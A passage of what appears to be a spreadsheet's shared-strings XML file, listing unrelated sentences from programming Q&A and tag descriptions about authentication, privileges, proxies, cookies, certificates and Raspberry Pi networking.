    <t>You would only need the Root CA certificate to be available in the trust store of the downstream device.</t>
  </si>
  <si>
    <t>This will prevent most people from reverse engineering your codes.</t>
  </si>
  <si>
    <t>Just remember, most "safe" distro's tend to default to Python2 for their LTS platforms.</t>
  </si>
  <si>
    <t>I think there were security concerns about enabling a full File Explorer on certain SKUs.</t>
  </si>
  <si>
    <t>Libraries need to be tested and have a team behind it to be trustworthy enough for crypto.</t>
  </si>
  <si>
    <t>.NET library for detecting devices and browsers.</t>
  </si>
  <si>
    <t>mod_proxy_html is an output filter to rewrite HTML links in a proxy situation, to ensure that links work for users outside the proxy.</t>
  </si>
  <si>
    <t>JavaScript and ActionScript) need them to save and upload files to / from the user's file system because all file system interaction is policed by the browser itself.</t>
  </si>
  <si>
    <t>Good Dynamics is an MDM platform and TLS / sandbox security implementation for mobile devices running iOS or Android.</t>
  </si>
  <si>
    <t>This configuration file can be applied for a specific user or on a specific repository.</t>
  </si>
  <si>
    <t>A jailbroken device has been rooted to allow the user to bypass sandboxing or other platform restrictions.</t>
  </si>
  <si>
    <t>Questions regarding the Microsoft Access 2013 database management system.</t>
  </si>
  <si>
    <t>The library does not provide remote messaging capabilities.</t>
  </si>
  <si>
    <t>SA-MP (San Andreas Multiplayer) is a multiplayer mod for Grand Theft Auto San Andreas allowing users to play against each other over the internet or LAN.</t>
  </si>
  <si>
    <t>Sodium is a portable, cross-compilable, installable, packageable fork of the NaCl Cryptograpy &amp; Networking library, with a compatible API.</t>
  </si>
  <si>
    <t>clientaccesspolicy.xml file enables cross-domain access in Silverlight</t>
  </si>
  <si>
    <t>For questions relating to the prevention of inbound or outbound spam.</t>
  </si>
  <si>
    <t>xss vulnerability is detected by doing cross-site scripting (XSS) injection for web application</t>
  </si>
  <si>
    <t>This user profile is called a managed profile.</t>
  </si>
  <si>
    <t>Topics relating to application security and attacks against software.</t>
  </si>
  <si>
    <t>A forward proxy is usually a client side concept used for anonymity, to subvert censorship, and as a web accelerator.</t>
  </si>
  <si>
    <t>The fourth most popular web vulnerability in accordance to OWASP Top 10 2013.</t>
  </si>
  <si>
    <t>Should be used on questions related to Amazon Cognito or related services:
- Amazon Cognito Sync
- Amazon Cognito Federated Identity
- Amazon Cognito Your User Pools</t>
  </si>
  <si>
    <t>For questions relating to a login control in a user interface (language independent).</t>
  </si>
  <si>
    <t>This tag is intended for MongoDB's replica set internal authentication.</t>
  </si>
  <si>
    <t>This tag is specific to Azure DDoS protection.</t>
  </si>
  <si>
    <t>You can run it against any web page, public or requiring authentication.</t>
  </si>
  <si>
    <t>This tag should be used for questions about the Laravel Auditing package.</t>
  </si>
  <si>
    <t>DigiCert Inc. serves as a Certificate Authority and Trusted Third Party that issues and validates digital certificates or TLS/SSL certificates.</t>
  </si>
  <si>
    <t>Telecommunication domain relates to wireless standards like GSM, GPRS, UMTS, LTE, WiMAX, IEEE 802.11.</t>
  </si>
  <si>
    <t>Use this tag for question about how or better still whether to encrypt passwords.</t>
  </si>
  <si>
    <t>**Please do not use this tag - use the [fraud-prevention] tag instead.</t>
  </si>
  <si>
    <t>An example would be a "Web filter" that screens out adult websites.</t>
  </si>
  <si>
    <t>In order to compromise a system, malware may exploit vulnerabilities in software or deceive users.</t>
  </si>
  <si>
    <t>About Web Application Penetration Testing on OWASP site.</t>
  </si>
  <si>
    <t>Any accepted HTTP cookie is stored in CookieStore and users can also have their own implementation.</t>
  </si>
  <si>
    <t>Then cookies it redirects the request to the nearest server location.</t>
  </si>
  <si>
    <t>libssh can run on top of either libgcrypt or libcrypto, two general-purpose cryptographic libraries.</t>
  </si>
  <si>
    <t>Official PHP documentation
PHP RFC proposal for password_hash()
password_compat compatibility package for PHP 5.3.7+</t>
  </si>
  <si>
    <t>The name (failsafe) was chosen both because it is a synonym of surefire and because it implies that when it fails, it does so in a safe way.</t>
  </si>
  <si>
    <t>This is based on the assumption that malicious websites can use these technologies in harmful ways.</t>
  </si>
  <si>
    <t>Help protect your users sessions from being stolen by cookie thieves.</t>
  </si>
  <si>
    <t>Most web applications needed to apply the same set of Interceptors over and over again.</t>
  </si>
  <si>
    <t>A plugin mechanism exists to support various interconnects, authentication mechanisms, schedulers, etc.</t>
  </si>
  <si>
    <t>At the top of the page, select Register App.</t>
  </si>
  <si>
    <t>Using OAuth 2.0 for Web Server Applications describes this in greater detail.</t>
  </si>
  <si>
    <t>Examples of competitions and contest platforms about which you might ask questions under this tag include
TopCoder 
Codeforces 
CodeChef 
SPOJ
ACM ICPC
Google Code Jam
Facebook Hacker Cup
IOI
...</t>
  </si>
  <si>
    <t>trickle runs entirely in userspace and does not require root privileges.</t>
  </si>
  <si>
    <t>Minecraft Forge builds can be downloaded at the Minecraft Forge Downloads page.</t>
  </si>
  <si>
    <t>See also: ghc
External resources
Official page
Package on Hackage</t>
  </si>
  <si>
    <t>If such a private network needs to connect to the Internet, it must use either a network address translator (NAT) gateway, or a proxy server.</t>
  </si>
  <si>
    <t>By adding Google Sign-In, you bring the power of Google to your site or application.</t>
  </si>
  <si>
    <t>Top Links
Google Sign-In for Websites</t>
  </si>
  <si>
    <t>Related Tags
authorize.net</t>
  </si>
  <si>
    <t>It can manage and provide access rights and controls using a web interface.</t>
  </si>
  <si>
    <t>So, the MetaMask wallet can be used for storing keys for Ether and ERC20 tokens on three different web browsers.</t>
  </si>
  <si>
    <t>This link points to various trainings that are free and offered by Intel FPGA.</t>
  </si>
  <si>
    <t>The defacto standard user-agent for a device is the one created by its web browser.</t>
  </si>
  <si>
    <t>The Standard can be found on the PCI SSC's Website:
https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml
Related Tags
pci-dss</t>
  </si>
  <si>
    <t>Once this duration is expired, the session cookies are erased.</t>
  </si>
  <si>
    <t>This tag should not be used for asking about the specific permissions that should be assigned in a particular scenario.</t>
  </si>
  <si>
    <t>The WICG Trusted Types Proposal allows web applications to opt-into additional dom xss-prevention checks.</t>
  </si>
  <si>
    <t>Because it is carried out from the user's IP address, some website logs might not have evidence of CSRF.</t>
  </si>
  <si>
    <t>You won't see this active in a browser since it poses security risks.</t>
  </si>
  <si>
    <t>See the Wikipedia entry for more background and concepts regarding certificates.</t>
  </si>
  <si>
    <t>See also
Access code
Account
Computer security
Login session
Login spoofing
OpenID
Password
Password policy
/var/log/wtmp
Related tag: authentication</t>
  </si>
  <si>
    <t>Model Types:
Series 1 - 802.15.4, Point to Point or Star Networking
Series 2 - ZigBee Mesh Networking
Details are at:
XBee Wikipedia page 
Digi International's XBee product line page.</t>
  </si>
  <si>
    <t>Useful Links
OWSAP SQL-Injection
OWSAP SQL Injection Prevention Cheat Sheet</t>
  </si>
  <si>
    <t>This tag should be used for questions about Intel hardware and software.</t>
  </si>
  <si>
    <t>If your question is about using Metasploit, rather than programming with it, then it should probably go on our sister site Information Security.</t>
  </si>
  <si>
    <t>I have experience with other forms of internet moderation (e.g.</t>
  </si>
  <si>
    <t>It requires very little moderation however, unlike the bigger sites in the network.</t>
  </si>
  <si>
    <t>I'm on a network where I need my Raspberry Pi to be windows authenticated in order to reach out of the network or to connect to any intranet sites.</t>
  </si>
  <si>
    <t>SecureCRT by Van Dyke Software has a 30-day free trial and will handle ordinary serial.</t>
  </si>
  <si>
    <t>I suggest enabling application logging in the Azure portal and then looking to see what the authentication error is.</t>
  </si>
  <si>
    <t>Notable examples are spiders, crawlers, scrapers, spam-bots and game-bots.</t>
  </si>
  <si>
    <t>You'd have to either expose the RasPi to the public internet (so Twilio's SMS callback could reach it), or use some proxy service in between.</t>
  </si>
  <si>
    <t>The shell is where the quoting problems come in so not involving a shell is a convenient way to cut out a whole class of errors and vulnerabilities.</t>
  </si>
  <si>
    <t>Besides requiring elevated privileges, there's also the possibility that your bluetooth controller is in an odd state.</t>
  </si>
  <si>
    <t>Users are frequently assigned (with or without their knowledge) Tickets, which are used to track their Authentication state.</t>
  </si>
  <si>
    <t>Hello World
As a hello world example, let's create a LoginFilter which checks the presence of the logged-in user in the HTTP session and handles accordingly.</t>
  </si>
  <si>
    <t>I have embedded my motion stream on an HTML page using Apache, but it will not display as it is an insecure iframe on a secure page.</t>
  </si>
  <si>
    <t>After a lot of struggles I finally figured out how to get selenium to work but I still have problem with browsermob proxy.</t>
  </si>
  <si>
    <t>Instead of hand coding sockets, I would suggest using HTTP with BASIC authentication to communicate between the device and the web server.</t>
  </si>
  <si>
    <t>when you set up a Cloudant NoSQL with Watson IoT Platform service, you should get a pop-up (sometimes in a new tab due to browser version) for setup confirmation.</t>
  </si>
  <si>
    <t>Kango allows creating extensions for popular browsers using JavaScript only, the code being single for all major browsers.</t>
  </si>
  <si>
    <t>As the raspberry pi doesn't have a screen, I couldn't do the normal OAuth flow which involves opening up a browser window.</t>
  </si>
  <si>
    <t>Google Cloud Messaging for Chrome (GCM) is a service for signed-in Chrome users that helps developers send message data from servers to their Chrome apps and extensions.</t>
  </si>
  <si>
    <t>The project includes a daemon implementing the above protocols, a BSD licensed RADIUS client library, a RADIUS PAM library, and an Apache module translating HTTP Basic-Authentication to RADIUS PAP authentication.</t>
  </si>
  <si>
    <t>Unobtrusive: Capability testing rather than browser detection, so newer standards-conformant browsers will automatically be supported.</t>
  </si>
  <si>
    <t>Wi-Fi Assist lets you automatically pop over to cellular data if you end up on a Wi-Fi network with a poor connection on iOS devices
It was introduced on iOS 9 and one can toggle this feature on and off.</t>
  </si>
  <si>
    <t>For me too many process and session running for a particular user is the cause of your problem so alternatively I logged in as root and ran the following commands:
After this I can login normally in putty like ever before.</t>
  </si>
  <si>
    <t>The Open Mobile API is a standardized, open and cross-language programming interface for access to secure elements in mobile devices.</t>
  </si>
  <si>
    <t>Identicons are used in Stack Overflow as the default profile image for users who have not created an account or uploaded their own profile image to gravatar.</t>
  </si>
  <si>
    <t>Where with the isp interface excluding xmega, there are chip to chip differences as far as the identification number, etc but easier come up with something more generic.</t>
  </si>
  <si>
    <t>The term is used more commonly for the automatically authenticated connections between MS IIS, Internet Explorer, and other Active Directory aware applications.</t>
  </si>
  <si>
    <t>In an attempt to utilize my web-connected security system with Home-Assistant (home-assistant.io), I did some research on its web interface, and it looks like it uses websockets to imitate keypad presses.</t>
  </si>
  <si>
    <t>The services provided by this library are used by the OpenSSL implementations of SSL, TLS and S/MIME, and they have also been used to implement SSH, OpenPGP, and other cryptographic standards.</t>
  </si>
  <si>
    <t>Some recent technologies enable websites to send push notifications to users (if they give their consent) even when they are not on the website.</t>
  </si>
  <si>
    <t>Cookie access control is based on domain, (optionally) path and (optionally) URL scheme (http: vs. https:).</t>
  </si>
  <si>
    <t>The web interface of a router
  basically has root access and in most cases you can set a bash script
  to run, surely that's just as insecure as what I'm trying to achieve
  with the Raspberry Pi.</t>
  </si>
  <si>
    <t>I make a particular promise: if elected, I will monitor the deletion log, undeletion vote log, and edits to recently-deleted questions.</t>
  </si>
  <si>
    <t>In many cases, you will have a hardware-specific or OS-specific solution for updating device firmware and this mechanism is the best approach and allows you to revoke and recover compromised devices.</t>
  </si>
  <si>
    <t>These addresses are commonly used for home, office, and enterprise local area networks (LANs), when globally routable addresses are not mandatory, or are not available for the intended network applications.</t>
  </si>
  <si>
    <t>Cross-Origin Read Blocking (CORB) is a security feature implemented in browsers that mitigates certain attacks by blocking access to resources which appear inappropriate for the context in which frontend code is trying to use the resource.</t>
  </si>
  <si>
    <t>The PHP code is ( Please provide your username,password,dbname,table name,column name in the provided locations of the code and upload it as i said above)  :
Obtain the URL of the uploaded PHP code (right click uploaded file and click view , then copy URL in the browser).</t>
  </si>
  <si>
    <t>In the Internet addressing architecture, a private network is a network that uses private IP address space, following the standards set by RFC 1918 for Internet Protocol Version 4 (IPv4), and RFC 4193 for Internet Protocol Version 6 (IPv6).</t>
  </si>
  <si>
    <t>These types of questions are generally off-topic, but here are some useful resources:
The "State of the Haskell Ecosystem" collaborative document
Browsing the list of packages on hackage and looking at download counts and reverse dependencies as a measure of popularity/maturity.</t>
  </si>
  <si>
    <t>You can switch between them like this:
# pacmd set-card-profile &lt;card_id&gt; &lt;profile_name&gt;
pacmd set-card-profile 1 a2dp
pacmd set-card-profile 1 hsp
Autoconnection
The package bluez-tools contains the tool called bt-monitor that captures the D-Bus signals from the bluetoothd daemon and initiates the connection for detected devices that are paired (and trusted).</t>
  </si>
  <si>
    <t>I'm logged in as the root user.</t>
  </si>
  <si>
    <t>Authentication can be implemented from within the web application (e.g.</t>
  </si>
  <si>
    <t>Users should be using their UPNs to log on to the domain.</t>
  </si>
  <si>
    <t>You may also bypass sanitization for values you know are safe.</t>
  </si>
  <si>
    <t>Useful links:
Documentation
Why is StringTokenizer a legacy class?</t>
  </si>
  <si>
    <t>However to write to /sys/class/gpio/ and /dev/mem/ you must have root privileges.</t>
  </si>
  <si>
    <t>If I try to log in as pi, it works fine, but if I log in with the other user, it logs in as root instead.</t>
  </si>
  <si>
    <t>I suspect it is something to do with permissions but I do not know where the problem is located.</t>
  </si>
  <si>
    <t>You have to run pip install using root privilege.</t>
  </si>
  <si>
    <t>Assuming you are not logging in as root.</t>
  </si>
  <si>
    <t>By default, the Raspberry Pi's GPIO interface requires superuser ("root") permissions.</t>
  </si>
  <si>
    <t>So eventually I logged in over SSH to the pi, and modified my rc.local file that way.</t>
  </si>
  <si>
    <t>And with desktop manager it runs with root privileges.</t>
  </si>
  <si>
    <t>WPA uses pre-shared keys that authenticate a device to a protected network.</t>
  </si>
  <si>
    <t>Questions regarding firewalld a firewall service daemon</t>
  </si>
  <si>
    <t>oauth2app is a Django OAuth 2.0 Server App module that helps Django site operators provide an OAuth 2.0 interface.</t>
  </si>
  <si>
    <t>The portal is often used to present a login page.</t>
  </si>
  <si>
    <t>The default user is Pi and i log as a Pi user and not as root, maybe this is the problem?</t>
  </si>
  <si>
    <t>I tried to change the password in the file and via the web interface but can't make it works.</t>
  </si>
  <si>
    <t>Is there anyway i can print to a specific logged in user which is local?</t>
  </si>
  <si>
    <t>On the X.509 Certificates and AWS IoT page, it is mentioned that one can
reference the CA root certificate in your device code when you connect to AWS IoT.</t>
  </si>
  <si>
    <t>I have just tried to obtain the access using many root-app for Android (such as Framaroot, KingoRoot, Rootmaster, z4root, ecc.)</t>
  </si>
  <si>
    <t>I was wondering what is the basic difference between UWP and console app when connecting with IoT hub using X.509 Certificate.</t>
  </si>
  <si>
    <t>Also, ownership of the export and unexport files will revert to root after each reboot.</t>
  </si>
  <si>
    <t>this seems ok, as the later steps seem to require root privileges as well.</t>
  </si>
  <si>
    <t>The problem is that you're running the web server under some user that doesn't have privileges to use the  functions you're using.</t>
  </si>
  <si>
    <t>root) than your current login, this is the root of the problem.</t>
  </si>
  <si>
    <t>It requires root privileges, and when X-server is started from user, e.g.</t>
  </si>
  <si>
    <t>So, since this is kind of a data security question: Security by obscurity doesn't work on general-purpose hardware.</t>
  </si>
  <si>
    <t>However, you cannot get admin access to the IoT Hub or use an IoT Hub of your own choosing - all you have is the device connection string.</t>
  </si>
  <si>
    <t>If you need to run a system command with elevated privileges think through the problem carefully!</t>
  </si>
  <si>
    <t>I would just run the python script itself with root privileges.</t>
  </si>
  <si>
    <t>These root CA certs are fixed through year 2030.</t>
  </si>
  <si>
    <t>Moduleuser doesnt have enough permissions and therefore it ignores Privileged:true option.</t>
  </si>
  <si>
    <t>Questions regarding the Microsoft Access 2002 database management system.</t>
  </si>
  <si>
    <t>Let you restrict views to logged-in (or logged-out) users.</t>
  </si>
  <si>
    <t>Security vulnerabilities can be exploited from any type of input.</t>
  </si>
  <si>
    <t>This is particularly useful when you have multiple pages for which you'd like to check the logged-in user.</t>
  </si>
  <si>
    <t>Messages can optionally be geo-tagged if sent from a GPS-equipped device.</t>
  </si>
  <si>
    <t>PyCryptodome can be used as:
an almost drop-in replacement for the old PyCrypto library.</t>
  </si>
  <si>
    <t>Suppose I am developing a fail-safe mechanism for Arduino (Or any other microcontroller).</t>
  </si>
  <si>
    <t>More or less like (here in Italy at least) hotels' WIFIs: you are free to connect, but you get redirected to a login page whatever address you put in the bar.</t>
  </si>
  <si>
    <t>My question is: What is the best way to do this, knowing that any code that will access the temperature probe must be run as root?</t>
  </si>
  <si>
    <t>How can i make the software also show my internal and external IP adress and some data from a website(on which you have to be logged in).</t>
  </si>
  <si>
    <t>Hello Everyone,
I am doing a project with RPI, I want Rpi to boot by internet, user login must be check with a server, and i want the sd to be encrypted.</t>
  </si>
  <si>
    <t>The Safari shows a 0 byte cookie in the Settings-&gt;Safari-&gt;Advanced-&gt;Website Data.</t>
  </si>
  <si>
    <t>I would like to connect an ESP8266 based sensor on a wifi network protected by a captive portal (I've no other option, and I cannot ask for derogation).</t>
  </si>
  <si>
    <t>Everything worked fine, I linked up the certificate in the config of the site, but then it suddenly stopped working.</t>
  </si>
  <si>
    <t>How can I make this page on the Arduino web server accessible only after login?</t>
  </si>
  <si>
    <t>So how can I build public server with access www site on my RPi and also want to connect over internet wity RPi via SSH.</t>
  </si>
  <si>
    <t>Going to website.com/test.php worked so I'm assuming the error lies within my login.php file but I haven't been able to figure it out.</t>
  </si>
  <si>
    <t>Problem: azure-iot-common depends on a package, crypto , that won't work in browser.</t>
  </si>
  <si>
    <t>I would also like to ask if there is any book explaining how audio is being exploited in Android.</t>
  </si>
  <si>
    <t>My MySQL user has global privileges, so includes the FILE privilege.</t>
  </si>
  <si>
    <t>I inspected the SSL certificate and it looks ok. As a quick-check: The browser tells me it's "secure".</t>
  </si>
  <si>
    <t>The folders have the rights: ---rwx---
I dont think this question is related to rsync - mkstemp failed: Permission denied (13) because Im already using ssh and the error message is different.</t>
  </si>
  <si>
    <t>if i can't change C920s output profile, please tell me how to streaming to browser from C920 no reencoding.</t>
  </si>
  <si>
    <t>This sends a HTTP_POST request to the web server which includes the SSID, and password of the selected WiFi network a JSON list.</t>
  </si>
  <si>
    <t>In my webpage, I'm planning on saving cookies (using javascript's document.cookie) to the user's device.</t>
  </si>
  <si>
    <t>It takes me directly to Thingsboard WebUI login page where I successfully log in and access the dashboard, devices etc.</t>
  </si>
  <si>
    <t>I have created a proxy server in Raspberry Pi using Squid Proxy.</t>
  </si>
  <si>
    <t>My Basic question is, does this method provide some reasonable level of security?</t>
  </si>
  <si>
    <t>Probably the actual question here is about a way to bypass Ethernet driver in Linux OS.</t>
  </si>
  <si>
    <t>Captive portals are used at many Wi-Fi hotspots, and can be used to control wired access (e.g.</t>
  </si>
  <si>
    <t>It would be very user friendly when the user connect to the device and doesn't have to open a browser first, type in an IP-address etc.</t>
  </si>
  <si>
    <t>It's been serving me for a few years as SSH entry point to my other pies etc.</t>
  </si>
  <si>
    <t>I am trying to install a proof-of-work proxy server from the link: https://docs.iota.org/docs/node-software/0.1/iri/how-to-guides/install-a-pow-proxy on Raspberry Pi 3B.</t>
  </si>
  <si>
    <t>Can you check this link which explains the authentication step:SSH Authentication</t>
  </si>
  <si>
    <t>It however doesn't normally prevent the PC from transmitting data, modulo a handshake wiring mistake.</t>
  </si>
  <si>
    <t>You cannot use the SSH link (git:// protocol, the git@github.com thingy) for this particular repository because it isn't allowed, as we can see on the github page.</t>
  </si>
  <si>
    <t>Try the following:
Alternatively, a safer implementation would be:
And if you would like to be able to access the data by the column name, i.e.</t>
  </si>
  <si>
    <t>There are some security concerns with BASIC authentication even if you use HTTPS, but it maybe acceptable in your particular case here.</t>
  </si>
  <si>
    <t>As far as I know, that's currently the only actively updated browser that retains the authentication throughout a session.</t>
  </si>
  <si>
    <t>Depending on what you need to do:
(1) If you want flash in the browser you will need to look into security http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b90204-7c60.html 
(2) or if you can use Air instead, you won't have to deal with any of this.</t>
  </si>
  <si>
    <t>See the following article on Wikipedia for more details:  Private network.</t>
  </si>
  <si>
    <t>Then the result is passed by the shell (not by echo) to a new command of /sys/class/gpio/export, which because it is a new command it isn't executed with elevated privileges.</t>
  </si>
  <si>
    <t>And connecting this application to the Internet is the very last step you should do (because open ports on servers in the internet are a invitation for criminals).</t>
  </si>
  <si>
    <t>That said, the AWS IoT MQTT implementation cannot guarantee any specific order to your devices' messages.</t>
  </si>
  <si>
    <t>The problem in your case is whether you can validate a session cookie on the Arduino.</t>
  </si>
  <si>
    <t>The main app, as in your case, is also run with elevated privileges i.e.</t>
  </si>
  <si>
    <t>And this proxy can return the Access-Control-Allow-Origin header if its not at the Same Origin as your page.</t>
  </si>
  <si>
    <t>This could be applied reversing the parity checking mechanism.</t>
  </si>
  <si>
    <t>This issue appeared not to be related to pm2 logs, but some missing permissions on the Raspberry Pi.</t>
  </si>
  <si>
    <t>I haven't sat down to see what's possible in the most recent releases, but if you're not at the very cutting edge, safe to say you cannot access the file system?</t>
  </si>
  <si>
    <t>And - remember my PKI setup - there is an intermediate CA that would eventually issue the device certificates.</t>
  </si>
  <si>
    <t>I have seen a few posts about similar occurrences of this leak with the AVAudioPlayer and VideoPlayer libraries around the web.</t>
  </si>
  <si>
    <t>I'd recommend going over this page: https://cloud.google.com/iot/docs/concepts/device-security</t>
  </si>
  <si>
    <t>Concerning the exposed code, the library doesn't seem to rely too much on C++ OOP features.</t>
  </si>
  <si>
    <t>Try:
I think pyserial has to be installed as root, for all users (the -U) for with versions for python 2 and 3, for it to work
If you don't have pip, get it from
https://pip.pypa.io/en/stable/installing/</t>
  </si>
  <si>
    <t>A cursory search of the internet turned up no technical details.</t>
  </si>
  <si>
    <t>Applications don't need to deal with passwords, and may instead ask for permission to gain access to specific accounts.</t>
  </si>
  <si>
    <t>Question context is related to spam prevention/filtering</t>
  </si>
  <si>
    <t>Federated identity is the larger concept encompassing narrow implementations such as Single-sign on (SSO).</t>
  </si>
  <si>
    <t>is for questions dealing with the technologies for the activation of software.</t>
  </si>
  <si>
    <t>SuperPreview is a Microsoft Expressions initiative that allows you to perform browser compatibility testing on your pages.</t>
  </si>
  <si>
    <t>Flask-Login provides user session management for the python web framework Flask.</t>
  </si>
  <si>
    <t>This tag should not be used for questions about encrypting traffic(HTTPS)</t>
  </si>
  <si>
    <t>It is used to register ASP.NET applications with Internet Information Services (IIS)</t>
  </si>
  <si>
    <t>A security constraint define the access privileges to a collection of resources using their URL mapping.</t>
  </si>
  <si>
    <t>unix/mac questions about password changes or storage, the related `.passwd` file or `passwd` command</t>
  </si>
  <si>
    <t>reCAPTCHA is a free service to protect your website from spam and abuse.</t>
  </si>
  <si>
    <t>vsftpd is a secure and fast FTP server for UNIX-like systems that is used on many large and critical Internet sites.</t>
  </si>
  <si>
    <t>For issues related to signing tags and commits in [git]</t>
  </si>
  <si>
    <t>The red zone is stack space that's safe from asynchronous modification even though it's not reserved the normal way.</t>
  </si>
  <si>
    <t>Questions related to the Google Data Loss Prevention API.</t>
  </si>
  <si>
    <t>This should apply to a exploitation and defense against side channel attacks such as timing base attack and cache side-channel attack</t>
  </si>
  <si>
    <t>Ask questions related to Bittrex the cryptocurrency company, wallets, exchange platform and API.</t>
  </si>
  <si>
    <t>This tag should be used for questions on how to generate, decode, or use barcodes in programs.</t>
  </si>
  <si>
    <t>.htpasswd is a flat-file used to store usernames and password for basic authentication of Apache HTTP Server.</t>
  </si>
  <si>
    <t>Tag for questions addressing the Azure Blockchain Service from Microsoft.</t>
  </si>
  <si>
    <t>Sender Policy Framework (SPF) is a system designed to prevent email spoofing/forgery</t>
  </si>
  <si>
    <t>phpass is a portable public domain password hashing framework for use in PHP applications.</t>
  </si>
  <si>
    <t>Only use this tag for programming issues related to data recovery.</t>
  </si>
  <si>
    <t>js-ctypes is a foreign-function library for privileged JavaScript in mozilla based applications such as Firefox, Thunderbird or Seamonkey.</t>
  </si>
  <si>
    <t>Domain names can be (and are) used on private networks, but they are an integral component of the modern Internet.</t>
  </si>
  <si>
    <t>Error: ORA-01031: insufficient privileges
Cause: A user attempted to perform an operation for which he does not have the appropriate privileges.</t>
  </si>
  <si>
    <t>It handles user accounts, groups, permissions and cookie-based user sessions.</t>
  </si>
  <si>
    <t>Obviously it is very important that it works properly and is also save against malicious attacks.</t>
  </si>
  <si>
    <t>When you download software from any other place on the Internet, Gatekeeper makes that safer, too.</t>
  </si>
  <si>
    <t>It is a browser security issue that is a vulnerability across a variety of browsers and platforms.</t>
  </si>
  <si>
    <t>Key features:
User authentication
Group management
User management
Contact management
Exchange mailbox creation
Official site.</t>
  </si>
  <si>
    <t>The term authz is frequently used in relation to Apache's authentication and authorization modules, where authentication is abbreviated "authn".</t>
  </si>
  <si>
    <t>Resources:
 SRWare Iron, homepage
SRWare Iron Wikipedia page
Rebuttal to SRWare's claims: SRWare Iron Browser  A Private Alternative To Chrome?</t>
  </si>
  <si>
    <t>Questions tagged with Toopher can pertain to the API, pairing, authenticating, how to do something, etc.</t>
  </si>
  <si>
    <t>Questions concerning installation or operation may be asked at Server Fault.</t>
  </si>
  <si>
    <t>This tag should be used if it is important to the question that the request should be unaltered, or cannot be altered.</t>
  </si>
  <si>
    <t>Internet Explorer also offers a similar function which the F12 key can access.</t>
  </si>
  <si>
    <t>Upon installing WordPress, an Administrato
Useful Links:
Login Forums
Login Plugins</t>
  </si>
  <si>
    <t>Read disruptor-pattern info page to learn about LMAX.</t>
  </si>
  <si>
    <t>Project Honey Pot tracks harvesters, comment spammers, and other suspicious visitors to websites.</t>
  </si>
  <si>
    <t>For example if each PC deadlocks once per 10 years, the one reboot may be less painful than the restrictions needed to prevent it.</t>
  </si>
  <si>
    <t>Once the user has been successfully authenticated, the user's login details will be stored in a session provided by mod_session.</t>
  </si>
  <si>
    <t>It may work with other servers, but
that is not its intended use, and interoperability can't be guaranteed, especially
not for .NET web services.</t>
  </si>
  <si>
    <t>You can even share your sites publicly using local tunnels.</t>
  </si>
  <si>
    <t>By default, Flow will just ignore these libraries leaving them untyped.</t>
  </si>
  <si>
    <t>Some users such as users with the subscriber role only have access to their profile page inside the admin area.</t>
  </si>
  <si>
    <t>This can be prevented by setting the ignore option to ignore: [] (ignore nothing; validate everything).</t>
  </si>
  <si>
    <t>request.getRequestDispatcher("/WEB-INF/login.jsp").forward(request, response);
}
If the login succeeds, the User object in session is available by ${user} in EL throughout the entire session.</t>
  </si>
  <si>
    <t>These attacks are used for everything from data theft to site defacement or distribution of malware.</t>
  </si>
  <si>
    <t>Some of the OpenCL implementation providers are:
NVIDIA
Intel 
AMD
Questions about OpenCL can be asked here along with the vendor/provider and architecture details.</t>
  </si>
  <si>
    <t>It translates domain names meaningful to humans into the IP addresses associated with the networking device.</t>
  </si>
  <si>
    <t>Any URL found on a Safe Browsing list is considered unsafe.</t>
  </si>
  <si>
    <t>PuTTY is a free implementation of Telnet and SSH for Windows and Unix platforms, along with an xterm terminal emulator.</t>
  </si>
  <si>
    <t>NCBI's data is publicly available from the main website and from ftp repositories.</t>
  </si>
  <si>
    <t>The IMEI is only used for identifying the device and has no permanent
  or semi-permanent relation to the subscriber.</t>
  </si>
  <si>
    <t>However, there are many situations where "normal" HTML and CSS can be used in a malicious manner.</t>
  </si>
  <si>
    <t>We want a royalty-free embedded solution on Raspberry PI to re-sell to customers.</t>
  </si>
  <si>
    <t>A simple, lightweight JavaScript API for handling cookies (previously called jquery-cookie)</t>
  </si>
  <si>
    <t>Each iOS application runs in its own secure sandbox to prevent (accidentally or intentionally) altering other applications, the operating system, or any other data.</t>
  </si>
  <si>
    <t>An application may remember the value of a selected alias to avoid prompting the user with choosePrivateKeyAlias on subsequent connections.</t>
  </si>
  <si>
    <t>Secure protocols such as HTTPS can guard against these attacks when correctly implemented at all layers including the application layer.</t>
  </si>
  <si>
    <t>Apparently, there are different ways to implement a lock:
There is the default C++ mutex library:
And there is the implementation from RTOS:
Are there fundamental differences I should be aware of?</t>
  </si>
  <si>
    <t>Having said that there are some things you can do, but you'll have to do them yourself:
Basic access authentication is a very insecure method of controlling access to HTTP pages so it isn't recommended.</t>
  </si>
  <si>
    <t>All files in the computer have ownership and permission data for them that would allow or disallow certain operations from different users - for instance only the superuser (root) can run the  application to turn off the computer.</t>
  </si>
  <si>
    <t>click on your Ethernet connection 
click property 
Select IP4
Change your IP to be in same rang with your raspberry pi
After that your visual studio will able to detect your device automatically.</t>
  </si>
  <si>
    <t>MonkeyTalk Benefits
Simulators or Real Devices - no Jailbreaking required
Robust cross-platform Recording/Playback that actually works!</t>
  </si>
  <si>
    <t>Here's a link to the official documentation
Another option is working remotely via ssh (I personally prefer this way because these small devices are normally slower).</t>
  </si>
  <si>
    <t>I still have no idea how related it was to my configuration (because it somehow was working without it), but after I fixed issues with this old not-async-safe code it started to behave as expected.</t>
  </si>
  <si>
    <t>DeHL is a library making use of advanced features (Generics and Anonymous Methods) introduced in recent Delphi versions.</t>
  </si>
  <si>
    <t>Resources:
std::atomic documentation at cppreference
An Introduction to Lock-Free Programming, by Jeff Preshing, and other articles linked from it.</t>
  </si>
  <si>
    <t>IDispatchMessageInspector is an extension point in the .Net WCF library which allows a WCF message to a service to be intercepted prior to it being serviced and again before the response is sent to the client.</t>
  </si>
  <si>
    <t>The feature was present from the earliest versions of PHP, but over time it became clear that it was a cause of many major security holes in PHP applications.</t>
  </si>
  <si>
    <t>It supports multiple log backends, formatting messages sent to the log, and filtering messages from being logged.</t>
  </si>
  <si>
    <t>The intent of partial trust is to reduce the risk of potentially malicious code downloaded from network locations from damaging or stealing information on the local machine.</t>
  </si>
  <si>
    <t>jBCrypt is licensed under a ISC/BSD licence (see the LICENSE file for details) and ships with a set of JUnit unit tests to verify correct operation of the library and compatibility with the canonical C implementation of the bcrypt algorithm.</t>
  </si>
  <si>
    <t>The scripts start a Man-In-The-Middle attack to which ever network the raspberry-pi is connected to, the problem is that when I am trying to configure the raspberry-pi the attack has already started and I have to stop the processes created by the ./main in htop.</t>
  </si>
  <si>
    <t>From Apple's release notes:
